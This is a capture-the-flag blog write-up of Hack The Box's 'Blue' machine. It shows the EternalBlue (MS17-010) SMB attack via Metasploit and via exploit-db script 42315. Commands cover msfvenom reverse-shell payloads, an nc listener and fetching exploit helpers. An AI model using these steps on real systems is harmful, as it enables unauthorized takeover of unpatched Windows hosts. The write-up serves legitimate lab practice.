Hack The Box — Blue

Write Up

5 min readJan 19, 2021


Blue is an easy retired machine on Hack The Box by ch4p. The vulnerability on this machine is MS17–010 also known as ‘Eternal Blue’. We exploited this machine first with a Metasploit module and then with a python exploit. This writeup will not include any passwords/cracked hashes/flags.

Blue — Info Card


We will start off by running an NMAP scan against the target IP:

nmap -p- -sV -oN blue-scan

From the results we can see that ports 139 and 445 are open. We will move on to investigating SMB.

Investigating SMB

We will connect to SMB using smbclient and see what is available:

smbclient -L
Investigating the target with smbclient

We can see two disk shares called ‘Share’ and one called ‘Users’, we will look at both of these:

smbclient \\\\\\Share
Investigating ‘Share’ using smbclient

There is nothing in ‘Share’ so let’s try ‘Users’:

smbclient \\\\\\Users
Investigating ‘Users’ using smbclient

We have access to a file-share but nothing really interesting. Given the Windows version our scan picked up, we will check to see if the server is vulnerable to eternal blue:

nmap -p 139,445 --script smb-vuln-ms17-010
Discovering MS17–010 vulnerability on target using nmap

We can see that the host is vulnerable. We will investigate ways to exploit this vulnerability.

Exploiting SMB using Metasploit

We will start msfconsole:

msfconsole -q

And search for MS17–010:

search ms17-010
Looking up MS17–010 using Metasploit

From the results we want to load the second exploit:

use 2

Now we can look at the options:

MS17–010 options in Metasploit

We will set RHOST to our targets IP:

Setting target host on Metasploit module

We will also set our payload:

set payload windows/x64/meterpreter/reverse_tcp

We will need to set our listener IP:


And before we run the exploit let’s use check to make sure the target is vulnerable:

Running a check against the target using Metasploit

Now we are ready we will run the exploit:


The exploit completes and we get a Meterpreter session:

Getting a Meterpreter session using Metasploit

We use the ‘shell’ command to drop into a shell and we can see that we are nt/authority system:


From here, we can get the user.txt and root.txt files.

Next, we will look at how to exploit this using a publicly available version of Eternal Blue.

Exploiting SMB — Python Script

We will use searchsploit to find an exploit:

searchsploit MS17-010
Using searchsploit to locate exploit

We find a list of exploits with one matching the Windows version on our target. We will save it to our local directory:

searchsploit -m 42315

Looking at the exploit we are required to meet a few conditions and make a few adjustments. We will need to download mysmb.py, this module is imported by the exploit. We also need to adjust the payload to one that meets our needs and finally we need to add credentials, we don’t have a password but we can use the ‘guest’ login account which is enabled on the service.

We have mysmb.py in our local directory already but if needed we could download it and rename it with the following commands:

wget https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42315.pymv 42315.py.1 mysmb.py

Next, we will generate a reverse shell executable using MSFvenom:

msfvenom -p windows/shell_reverse_tcp -f exe LHOST= LPORT=4444 > eternal-blue.exe

Now we have the reverse shell executable in our working directory we need to modify the path of the exploit in the python script. The original script looks like this:

We need to uncomment lines 922 and 923 and adjust the details to the following:

This will call to our executable payload on our attack machine and execute it once it is present on the victim.

Finally, we need to adjust the login details, we need to change the following to include, at least, a valid user. We know ‘guest’ is valid so we will use that in our adjusted script:

Next, we will setup our listener:

nc -lvnp 4444

And finally run the exploit against the target:

python 42315.py

The exploit runs:

And we can see we have a reverse shell connection to our listener as nt authority\system:

From here we can collect the proof flags and as before.




Hi, I’m Ben. This blog is for my write-ups on my journey through learning in infosec. I am OSCP certified and currently looking for experience in the industry.